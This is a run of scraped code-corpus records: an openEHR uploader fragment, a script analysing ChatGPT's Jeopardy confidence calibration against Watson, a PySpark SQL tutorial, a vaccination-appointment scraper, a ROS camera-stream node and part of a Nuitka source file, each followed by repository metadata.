if(check):
print(f'{compok}/{compinserted} checked successfully')
logging.info(f'{compok}/{compinserted} checked successfully')
print(f'{compinserted-compok}/{compinserted} checked unsuccessfully')
logging.info(f'{compinserted-compok}/{compinserted} checked unsuccessfully')
if __name__ == '__main__':
main()
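
# A minimal sketch of the naming helpers above:
#   convertcase("archetypeNodeId") -> "archetype_node_id"
#   flatten({"context": {"setting": "home"}}) -> {"context_setting": "home"}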
|
crs4/TO_OPENEHR_CONVERTER
|
COMPOSITIONS_UPLOADER/CompositionUploader.py
|
CompositionUploader.py
|
py
| 11,566 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "json.dumps",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "json_tools.diff",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "collections.abc",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "typing.Any",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "typing.Callable",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "re.sub",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 136,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 138,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 145,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 146,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 148,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 149,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 152,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 154,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "uuid.UUID",
"line_number": 162,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 174,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 183,
"usage_type": "attribute"
},
{
"api_name": "logging.basicConfig",
"line_number": 186,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 193,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 193,
"usage_type": "attribute"
},
{
"api_name": "logging.error",
"line_number": 195,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 201,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 208,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 215,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 217,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 217,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 217,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 220,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 222,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 222,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 222,
"usage_type": "attribute"
},
{
"api_name": "logging.info",
"line_number": 229,
"usage_type": "call"
},
{
"api_name": "requests.Session",
"line_number": 235,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "url_normalize.url_normalize",
"line_number": 246,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 248,
"usage_type": "call"
},
{
"api_name": "logging.error",
"line_number": 251,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 252,
"usage_type": "call"
},
{
"api_name": "url_normalize.url_normalize",
"line_number": 256,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 262,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 262,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 264,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 271,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 280,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 281,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 282,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 286,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 288,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 291,
"usage_type": "call"
},
{
"api_name": "url_normalize.url_normalize",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 300,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 301,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 302,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 304,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 305,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 313,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 314,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 315,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 318,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 322,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 326,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 328,
"usage_type": "call"
}
] |
40814128
|
"""
Plot the results.
"""
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import datasets
# Set a nice seaborn style for matplotlib
sns.set_theme()
#%%
# Load results from csv
df = pd.read_csv("jeopardy_results.csv", index_col="idx")
#%%
# Load the dataset from the Hugging Face Hub
dataset = datasets.load_dataset("jeopardy", split="train")
# Turn dataset into a dataframe
dataset = pd.DataFrame(dataset)
# Rename the category column to avoid conflicts
dataset.rename(columns={"category": "category_dataset", "question": "question_dataset"}, inplace=True)
#%%
# Join the dataset with the results (we don't have results for all rows)
full_df = df.join(dataset, how="inner")
# Verify that category_dataset and category are the same
assert (full_df["category_dataset"] == full_df["category"]).all()
# Verify that question_dataset and question are the same
assert (full_df["question_dataset"] == full_df["question"]).all()
# Delete category_dataset and question_dataset
del full_df["category_dataset"]
del full_df["question_dataset"]
#%%
# We have one nan
# The log message is: Expected confidence between 0 and 1, got content='I apologize, but I cannot provide a specific numerical value of my confidence level, as I am an artificial intelligence language model, and I do not have personal feelings or emotions. However, based on my knowledge and analysis of the available information, I am confident that my answer (South Africa) is correct.' additional_kwargs={}
# Check that that is the case
#assert len(full_df[full_df["confidence"].isna()]) == 1
#assert full_df[full_df["confidence"].isna()].iloc[0]["answer"] == "South Africa"
# Set the confidence to 1.
#full_df["confidence"].fillna(1, inplace=True)
# Drop rows with na in confidence
full_df.dropna(subset=["confidence"], inplace=True)
#%%
# Plot the distribution of confidence
sns.histplot(data=full_df, x="confidence", bins=20)
# Save as svg
plt.savefig("confidence_distribution.svg", format="svg", bbox_inches="tight", pad_inches=0, transparent=False)
plt.show()
#%%
# Plot a calibration plot using sklearn
from sklearn.calibration import CalibrationDisplay
# Get the calibration display
cal_display = CalibrationDisplay.from_predictions(
y_true=full_df["accuracy"], y_prob=full_df["confidence"], n_bins=5, name="ChatGPT",
strategy="uniform"
)
# Plot the calibration curve
cal_display.plot()
plt.savefig("chatgpt_calibration.svg", format="svg", bbox_inches="tight", pad_inches=0, transparent=False)
plt.show()
#%%
# Plot the AUROC curve with RocCurveDisplay
from sklearn.metrics import RocCurveDisplay
roc_display = RocCurveDisplay.from_predictions(
y_true=full_df["accuracy"], y_pred=full_df["confidence"], name="ChatGPT")
# Plot the ROC curve
roc_display.plot()
plt.show()
#%% Load the watson_cmp data
import numpy as np
watson_cmp = pd.read_csv("watson_cmp/watson_v0.8_precision_recall.csv")
# Sort the data by recall (ascending)
watson_cmp.sort_values(by="recall", inplace=True)
# Compute the average precision score for watson_cmp (which has recall, precision as columns)
# Use np.sum(np.diff(recall) * np.array(precision)[:-1]) to compute the area under the curve
watson_avg_precision = np.sum(np.diff(watson_cmp["recall"]) * np.array(watson_cmp["precision"])[:-1])
print(f"watson_avg_precision: {watson_avg_precision}")
#%%
# Plot the precision-recall curve with PrecisionRecallDisplay
from sklearn.metrics import PrecisionRecallDisplay
import matplotlib.ticker as mtick
pr_display = PrecisionRecallDisplay.from_predictions(
y_true=full_df["accuracy"], y_pred=full_df["confidence"], name="ChatGPT")
# Plot the precision-recall curve
pr_display.plot()
pr_display_watson = PrecisionRecallDisplay(
precision=watson_cmp["precision"], recall=watson_cmp["recall"],
average_precision=watson_avg_precision,
estimator_name="Watson v0.8"
)
# Plot the precision-recall curve for Watson
pr_display_watson.plot(ax=plt.gca())
# X axis is % Answered
plt.xlabel("% Answered")
# Change the ticks and labels to be percentages (in 10% increments)
plt.xticks([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
["0%", "10%", "20%", "30%", "40%", "50%", "60%", "70%", "80%", "90%", "100%"])
# Y axis is Precision
plt.ylabel("Precision")
# Change the labels to be in percentages
plt.gca().yaxis.set_major_formatter(mtick.PercentFormatter(1.0))
plt.savefig("chatgpt_watson_v0.8_precision_recall.svg", format="svg", bbox_inches="tight", pad_inches=0, transparent=False)
plt.show()
#%% Compute a baseline accuracy:
# We check whether the true_answer is literally contained in ChatGPT's answer
# If so, we count it as "obviously" correct
# This is a very naive baseline, but it's a good sanity check
# use apply to apply the function to each row
full_df["baseline_accuracy"] = full_df.apply(
lambda row: int(row["true_answer"].lower() in row["model_answer"].lower()), axis=1)
#%% Compute accuracy by round
# Get the number of correct answers by round
correct_by_round = full_df.groupby(["round"]).agg({"accuracy": "sum", "baseline_accuracy": "sum"})
# Get the total number of answers by round
total_by_round = full_df.groupby(["round"]).agg({"accuracy": "count", "baseline_accuracy": "count"})
# Compute the accuracy by round
accuracy_by_round = correct_by_round / total_by_round
# Render the accuracy by round as markdown table
print(accuracy_by_round.to_markdown())
#%%
# Overall accuracy:
print(f"Overall accuracy: {full_df['accuracy'].mean()}")
print(f"Overall string contains accuracy: {full_df['baseline_accuracy'].mean()}")
#%% Extract the baseline_accuracy == 0 and accuracy == 1 answers in a new df
correct_but_not_obviously_correct = full_df[(full_df["baseline_accuracy"] == 0) & (full_df["accuracy"] == 1)]
# Subselect the question, true_answer, model_answer columns
correct_but_not_obviously_correct = correct_but_not_obviously_correct[["true_answer", "model_answer", "question"]]
# Save to csv
correct_but_not_obviously_correct.to_csv("correct_but_not_obviously_correct.csv", index=True)
#%% Are they baseline_accuracy == 1 and accuracy == 0?
# Extract the baseline_accuracy == 1 and accuracy == 0 answers in a new df
obviously_correct_but_incorrect = full_df[(full_df["baseline_accuracy"] == 1) & (full_df["accuracy"] == 0)]
# Subselect the question, true_answer, model_answer columns
obviously_correct_but_incorrect = obviously_correct_but_incorrect[["true_answer", "model_answer", "question"]]
# Save to CSV as potential false negatives
obviously_correct_but_incorrect.to_csv("potential_false_negatives.csv", index=True)
|
BlackHC/player_of_jeopardy
|
analysis.py
|
analysis.py
|
py
| 6,596 |
python
|
en
|
code
| 10 |
github-code
|
6
|
[
{
"api_name": "seaborn.set_theme",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datasets.load_dataset",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "seaborn.histplot",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 61,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 62,
"usage_type": "name"
},
{
"api_name": "sklearn.calibration.CalibrationDisplay.from_predictions",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "sklearn.calibration.CalibrationDisplay",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 76,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 77,
"usage_type": "name"
},
{
"api_name": "sklearn.metrics.RocCurveDisplay.from_predictions",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.RocCurveDisplay",
"line_number": 85,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 89,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "numpy.diff",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.PrecisionRecallDisplay.from_predictions",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.PrecisionRecallDisplay",
"line_number": 110,
"usage_type": "name"
},
{
"api_name": "sklearn.metrics.PrecisionRecallDisplay",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.gca",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 121,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 124,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 124,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xticks",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 126,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 130,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.gca",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 132,
"usage_type": "name"
},
{
"api_name": "matplotlib.ticker.PercentFormatter",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "matplotlib.ticker",
"line_number": 132,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 134,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 135,
"usage_type": "name"
}
] |
73008025149
|
# Lesson 26 my code
from pyspark.sql import SparkSession #import spark sql with session and row
from pyspark.sql import Row #both of these things we use to interact with SparkSQL and dataFrames
spark = SparkSession.builder.appName("SparkSQL").getOrCreate() #the get or create again, creating a new spark session or connect to one from a previous one
def mapper(line):
fields = line.split(',')
return Row(ID = int(fields[0]), #going in order to create the rows. First field or 0th element is ID, etc.
name = str(fields[1].encode("utf-8")), \
age = int(fields[2]),
numFriends = int(fields[3]))
lines = spark.sparkContext.textFile("../CSV/fakefriends.csv") #note that this csv does NOT have headers so it may make it difficult to structure the data. We still have SparkContext available under spark session. Creates RDD named lines.
# Also quick note, original code said textFile("fakefriends.csv"); this still has the path problem so I had to update it to go to the directory with the csv files
people = lines.map(mapper) #map every row from the incoming lines. Need rows first before creating a DataFrame.
schemaPeople = spark.createDataFrame(people).cache() #we first infer the schema. Passing in people RDD and converting into dataframe. Keep this in memory, that's why we cache it
schemaPeople.createOrReplaceTempView("people") #register the DataFrame as a table. Existing view then it would be replaced. Can use this like a database table
teenagers = spark.sql("SELECT * FROM people WHERE age >= 13 AND age <= 19")
#SQL can be run over DataFrames that have been registered as a table ^^^. Teenagers is a dataFrame!! Also the names map back to the names we gave them when we constructed the Row object.
for teen in teenagers.collect(): #results of SQL queries are RDDs and support all the normal RDD operations
print(teen) #this is a simple collect and print
schemaPeople.groupBy("age").count().orderBy("age").show() #can also use fcns rather than SQL queries. We can do either fcns or SQL commands!
spark.stop() #kinda like opening and closing a database. good practice to close if we do not use. Stop when done.
|
CenzOh/Python_Spark
|
MyCode/sparkSql.py
|
sparkSql.py
|
py
| 2,183 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pyspark.sql.SparkSession.builder.appName",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "pyspark.sql.SparkSession",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "pyspark.sql.Row",
"line_number": 9,
"usage_type": "call"
}
] |
24254182121
|
import time
import requester
import json
import config
location_id_data = {}
exclude_ids = config.settings["loc_ids_to_exclude"] # Gananoque & Tay Valley Old People One & Prescott
def parseLocationsToDict():
# Locations.json is extracted from the bottom of the pomelo covid-vaccination "locations" html page where you select a spot.
# Kinda stupid so I just extracted it and then saved it as a json.
with open("data/locations.json", encoding="utf-8") as data_file:
location_data = json.loads(data_file.read())["locations"]
for location in location_data:
loc_id = location["loc_id"]
location_id_data[loc_id] = location
def locAddyToAddress(data):
address = data["address"].strip()
# address2 = data["address2"].strip()
city = data["city"].strip()
# province = data["province"].strip()
# country = data["country"].strip()
postal = data["postal"].strip()
loc_address = address + ", " + city + ", " + postal
return loc_address
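# Scan the active locations, skip excluded ones, and record the earliest available appointment in the shared config.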
def check_locations(checking_locations, verbose_output):
config.resetLastAvailableDate()
for x in checking_locations:
if x["id"] not in exclude_ids:
loc_id = x["id"]
loc_name = location_id_data[loc_id]["loc_name"].replace(" ", " ")
loc_address = locAddyToAddress(location_id_data[loc_id]["address"])
unavailable = x["hasUnavailableAppointments"]
if verbose_output:
print(f"{loc_id} {loc_name} ({loc_address})")
if unavailable:
print(f"{loc_id} No appointments available.")
print("*" * 50)
if not unavailable:
earliest_date = requester.findEarliestDate(loc_id)
if earliest_date["available"]:
current_loc_data = earliest_date["nextByLocId"][0]
config_epoch = config.settings["earliest_epoch"]
next_epoch = current_loc_data["next_date"]
readable_time = current_loc_data["next"]
if config_epoch == 0 or next_epoch < config_epoch:
# Found new epoch!
value_list = [readable_time, next_epoch, loc_id, loc_name, loc_address]
key_list = ["earliest_date", "earliest_epoch", "earliest_loc_id", "earliest_loc_name",
"earliest_loc_address"]
config.updateKeys(key_list, value_list)
if verbose_output:
print(f"{loc_id} {readable_time}")
print("*" * 50)
def alertAvailableDate():
latest_epoch = config.settings["earliest_epoch"]
alert_epoch = config.settings["alert_epoch"]
last_epoch_alerted = config.settings["last_epoch_alerted"]
date = config.settings["earliest_date"]
loc_name = config.settings["earliest_loc_name"]
loc_address = config.settings["earliest_loc_address"]
if latest_epoch != 0 and last_epoch_alerted != latest_epoch:
if latest_epoch < alert_epoch:
# New Time is before alert epoch! Announce
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print(f"{loc_name} ({loc_address})")
print(f"ALERT NEW TIME: {date})")
config.update("last_epoch_alerted", latest_epoch)
else:
# This will output every time a different earliest date is available.
# Remove to only alert before the alert epoch
print(f"{loc_name} ({loc_address})")
print(f"AVAILABLE: {date}")
config.update("last_epoch_alerted", latest_epoch)
if __name__ == "__main__":
print("Pomelo Vaccination Appointment Date Scraper")
print("*" * 50)
parseLocationsToDict()
#requester.getHMSession()
active_locations = requester.getLocations()
check_locations(active_locations, True)
alertAvailableDate()
print("*" * 50)
time.sleep(60)
for i in range(5000):
active_locations = requester.getLocations()
check_locations(active_locations, False)
alertAvailableDate()
print("*" * 50)
time.sleep(60)
|
TASelwyn/PomeloScraper
|
main.py
|
main.py
|
py
| 4,417 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "config.settings",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "json.loads",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "config.resetLastAvailableDate",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "requester.findEarliestDate",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "config.settings",
"line_number": 53,
"usage_type": "attribute"
},
{
"api_name": "config.updateKeys",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "config.settings",
"line_number": 72,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 73,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 74,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 76,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 77,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 78,
"usage_type": "attribute"
},
{
"api_name": "config.update",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "config.update",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "requester.getLocations",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "requester.getLocations",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 112,
"usage_type": "call"
}
] |
73369850107
|
#!/usr/bin/env python3
import rospy
import socket as s
import numpy as np
from cv_bridge import CvBridge
import cv2
import pickle
import struct
import time
# import ROS messages
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from std_msgs.msg import Header
from utils import Msg
import constants
fps_counter = 50
"""
This node receives the RGBD camera stream over tcp from the host machine and publishes it for rtabmap_ros.
"""
def setupSocket():
socket = s.socket(s.AF_INET, s.SOCK_STREAM)
socket.bind((constants.HOST, constants.PORT_CAMERA))
socket.listen()
return socket
def setupCameraInfo():
# information on parameters. http://docs.ros.org/en/melodic/api/sensor_msgs/html/msg/CameraInfo.html
camera_info = CameraInfo()
camera_info.width = constants.FRAME_WIDTH
camera_info.height = constants.FRAME_HEIGHT
camera_info.distortion_model = constants.CAMERA_DISTORTION_MODEL
camera_info.D = constants.CAMERA_D
camera_info.K = constants.CAMERA_K
camera_info.R = list(np.eye(3).reshape(9).astype(np.float32))
camera_info.P = list(np.hstack([np.array(constants.CAMERA_K).reshape((3, 3)), np.zeros((3, 1))]).reshape(12).astype(np.float32))
return camera_info
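# Deserialize one streamed frame: the color image arrives JPEG-compressed, the depth image as a raw array.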
def decode(msg_bytes):
msg = pickle.loads(msg_bytes)
color = cv2.imdecode(np.frombuffer(msg.color, dtype=np.uint8), cv2.IMREAD_COLOR)
depth = msg.depth
return color, depth
def main():
# initialize node and topics
rospy.init_node('camera_node', anonymous=True)
color_pub = rospy.Publisher('/camera/rgb/image_rect_color', Image, queue_size=1)
depth_pub = rospy.Publisher('/camera/depth_registered/image_raw', Image, queue_size=10)
info_pub = rospy.Publisher('/camera/rgb/camera_info', CameraInfo, queue_size=10)
# create camera_info and CvBridge
camera_info = setupCameraInfo()
bridge = CvBridge()
rospy.loginfo("[Camera publisher] Waiting for streamer connection")
socket = setupSocket()
conn, address = socket.accept()
start_time = time.time()
indx = 0
# publisher loop
while not rospy.is_shutdown():
# Receive the size of the data and then the data itself from the socket connection
data_size = conn.recv(4)
size = struct.unpack('!I', data_size)[0]
data = b''
while len(data) < size and not rospy.is_shutdown():
packet = conn.recv(size - len(data))
if not packet:
break
data += packet
# Convert the byte array to an OpenCV image
color_image, depth_image = decode(data)
# transform to ROS Image messages
color_ros = bridge.cv2_to_imgmsg(color_image, encoding="rgb8")
depth_ros = bridge.cv2_to_imgmsg(depth_image, encoding="mono16")
# set headers
current_time = rospy.get_time()
header = Header(stamp=rospy.Time.from_sec(current_time), frame_id="camera_link")
color_ros.header = header
depth_ros.header = header
camera_info.header = header
# publish
color_pub.publish(color_ros)
depth_pub.publish(depth_ros)
info_pub.publish(camera_info)
if indx % fps_counter == 0:
elapsed_time = time.time() - start_time
fps = fps_counter / (elapsed_time)
# rospy.loginfo(f"FPS: {fps}")
start_time = time.time()
indx += 1
conn.close()
# rospy.loginfo("Streamer disconnected")
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
yv1es/MRMapper
|
core/ros_node/mr-mapper/src/camera_publisher.py
|
camera_publisher.py
|
py
| 3,667 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "socket.socket",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "socket.AF_INET",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "socket.SOCK_STREAM",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "socket.bind",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "constants.HOST",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "constants.PORT_CAMERA",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "socket.listen",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "sensor_msgs.msg.CameraInfo",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "constants.FRAME_WIDTH",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "constants.FRAME_HEIGHT",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "constants.CAMERA_DISTORTION_MODEL",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "constants.CAMERA_D",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "constants.CAMERA_K",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "numpy.eye",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "numpy.hstack",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "constants.CAMERA_K",
"line_number": 44,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 44,
"usage_type": "attribute"
},
{
"api_name": "pickle.loads",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "cv2.imdecode",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "numpy.frombuffer",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "cv2.IMREAD_COLOR",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "rospy.init_node",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "rospy.Publisher",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "sensor_msgs.msg.Image",
"line_number": 59,
"usage_type": "argument"
},
{
"api_name": "rospy.Publisher",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "sensor_msgs.msg.Image",
"line_number": 60,
"usage_type": "argument"
},
{
"api_name": "rospy.Publisher",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "sensor_msgs.msg.CameraInfo",
"line_number": 61,
"usage_type": "argument"
},
{
"api_name": "cv_bridge.CvBridge",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "rospy.loginfo",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "socket.accept",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "rospy.is_shutdown",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "struct.unpack",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "rospy.is_shutdown",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "rospy.get_time",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "std_msgs.msg.Header",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "rospy.Time.from_sec",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "rospy.Time",
"line_number": 98,
"usage_type": "attribute"
},
{
"api_name": "time.time",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "rospy.ROSInterruptException",
"line_number": 125,
"usage_type": "attribute"
}
] |
16542834327
|
import sys
from nuitka import Options
from nuitka.ModuleRegistry import (
getDoneModules,
getUncompiledModules,
getUncompiledTechnicalModules,
)
from nuitka.plugins.Plugins import Plugins
from nuitka.PythonVersions import python_version
from nuitka.Tracing import inclusion_logger
from nuitka.utils.CStrings import encodePythonStringToC, encodePythonUnicodeToC
from .Indentation import indented
from .templates.CodeTemplatesLoader import (
template_metapath_loader_body,
